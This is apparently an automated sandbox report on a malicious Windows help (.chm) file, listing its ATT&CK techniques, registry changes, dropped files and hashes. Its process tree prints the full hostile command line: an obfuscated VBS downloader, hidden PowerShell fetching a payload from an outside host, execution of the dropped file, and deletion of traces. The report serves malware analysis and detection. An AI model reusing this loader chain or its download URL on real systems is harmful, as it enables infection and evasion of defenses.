1add121c2feec6d6e010da17f2a84fe71236b6ab1f55a62a02014f72b62ce3a4

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
29-01-2025 02:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1add121c2feec6d6e010da17f2a84fe71236b6ab1f55a62a02014f72b62ce3a4.chm
Size

75KB
MD5

9c8a5461b7d545e1df98e0d63bc27ec2
SHA1

bef27ecbd3832ecd148c81bf3a3272408833e492
SHA256

1add121c2feec6d6e010da17f2a84fe71236b6ab1f55a62a02014f72b62ce3a4
SHA512

ad2cc969ad7dbbf88908e5e85d93e193b47dc1a0bf48cd3eff578434ceaa541f41d874f7531baf52809a3767d50a15110789ead221e92f61514bbfc53e0e96ac
SSDEEP

1536:4G2kZqDwXQa3OFBLedkZdWSycuSF02YqlO5Szs7HJiJl:R2kZZXHMBL7hr1W2VlOW

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2968	powershell.exe
2304	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
264	ript.exe
2636	x.exe

Loads dropped DLL 4 IoCs

pid	Process
2968	powershell.exe
2968	powershell.exe
2968	powershell.exe
2968	powershell.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
2892	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
2732	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main	hh.exe

Modifies system certificate store 2 TTPs 2 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	ript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	ript.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2636	x.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2968	powershell.exe
2304	powershell.exe
2304	powershell.exe
2304	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	2732	taskkill.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2848	hh.exe
2848	hh.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2848 wrote to memory of 2892	2848	hh.exe	30
PID 2848 wrote to memory of 2892	2848	hh.exe	30
PID 2848 wrote to memory of 2892	2848	hh.exe	30
PID 2892 wrote to memory of 2720	2892	cmd.exe	32
PID 2892 wrote to memory of 2720	2892	cmd.exe	32
PID 2892 wrote to memory of 2720	2892	cmd.exe	32
PID 2892 wrote to memory of 2968	2892	cmd.exe	33
PID 2892 wrote to memory of 2968	2892	cmd.exe	33
PID 2892 wrote to memory of 2968	2892	cmd.exe	33
PID 2968 wrote to memory of 264	2968	powershell.exe	34
PID 2968 wrote to memory of 264	2968	powershell.exe	34
PID 2968 wrote to memory of 264	2968	powershell.exe	34
PID 2892 wrote to memory of 2304	2892	cmd.exe	36
PID 2892 wrote to memory of 2304	2892	cmd.exe	36
PID 2892 wrote to memory of 2304	2892	cmd.exe	36
PID 2304 wrote to memory of 3032	2304	powershell.exe	37
PID 2304 wrote to memory of 3032	2304	powershell.exe	37
PID 2304 wrote to memory of 3032	2304	powershell.exe	37
PID 3032 wrote to memory of 2332	3032	cmd.exe	39
PID 3032 wrote to memory of 2332	3032	cmd.exe	39
PID 3032 wrote to memory of 2332	3032	cmd.exe	39
PID 2892 wrote to memory of 2732	2892	cmd.exe	40
PID 2892 wrote to memory of 2732	2892	cmd.exe	40
PID 2892 wrote to memory of 2732	2892	cmd.exe	40
PID 3032 wrote to memory of 2636	3032	cmd.exe	41
PID 3032 wrote to memory of 2636	3032	cmd.exe	41
PID 3032 wrote to memory of 2636	3032	cmd.exe	41
PID 3032 wrote to memory of 2636	3032	cmd.exe	41

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\1add121c2feec6d6e010da17f2a84fe71236b6ab1f55a62a02014f72b62ce3a4.chm
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2848
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Windows\system32\extrac32.exe
    extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
    3⤵
    PID:2720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2968
  - - C:\Users\Public\ript.exe
      "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      PID:264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2304
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Public\df.cmd" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3032
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        
        PID:2332
    - - C:\Users\Admin\AppData\Local\Temp\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2636
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hh.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\x.exe

Filesize
1.1MB

MD5
bbc7fc385a2e1198bc272acb466a70a9

SHA1
7352a3101f8e53f694fa1af71e57bda25655ce08

SHA256
7babe42bb73034aa6b7b9007ad1a07168f3302eba34a4caff6ce9c5f081fa4f5

SHA512
033227e1678e5fb3b844e64dfc7974ad76c9ca15d585935e13f7464749feae14319cc3a4406fd79fa0dff553be9f558938d30caecf09503c8c6a4b389eb3dd58

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7347e96441a80c1b6faa40469cfdba3f

SHA1
3c7780b60d1a8f497c99dd6fcf982eb107544044

SHA256
1877f192851664804cdb2045226374d44b50418f6818edccb7367dda301ec471

SHA512
2ea7195f21e8f3902191a60f26a16dfe65e6f3d0e101bb620d909ccc4ede532252c445c1a62025b013c61a41972a002537f31610b84b63be2a8b618a499f854f

Download Submit
C:\Users\Public\aloha.vbs

Filesize
194B

MD5
71efa4ec6c67fa5665b1d0c64d60fc25

SHA1
f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

SHA256
08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

SHA512
7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

Download Submit
C:\Users\Public\df.cmd

Filesize
1.1MB

MD5
298baf7c77327a1641678b6807c230b4

SHA1
e8fd19fcc7722c2a1644478339b3b766bb2a08dc

SHA256
8f5897f90faa79aafbcc79d2b0e69a5c4c47ca9b9b55206ec7f293baaafc3b35

SHA512
11bda296eafcdf657f0cf9bf8302fcf695a701cbff895cbbd203141be6a41693c9544fa778acd901051f271385c22d1fc87d931de0bcc02e0a9db53822155014

Download Submit
C:\Users\Public\ript.exe

Filesize
152KB

MD5
791af7743252d0cd10a30d61e5bc1f8e

SHA1
70096a77e202cf9f30c064956f36d14bcbd8f7bb

SHA256
e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

SHA512
d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

Download Submit
memory/2304-53-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2304-54-0x0000000002870000-0x0000000002878000-memory.dmp

Filesize
32KB

Download
memory/2636-62-0x0000000000400000-0x0000000000519000-memory.dmp

Filesize
1.1MB

Download
memory/2636-61-0x00000000032C0000-0x00000000042C0000-memory.dmp

Filesize
16.0MB

Download
memory/2968-25-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/2968-26-0x0000000001F50000-0x0000000001F58000-memory.dmp

Filesize
32KB

Download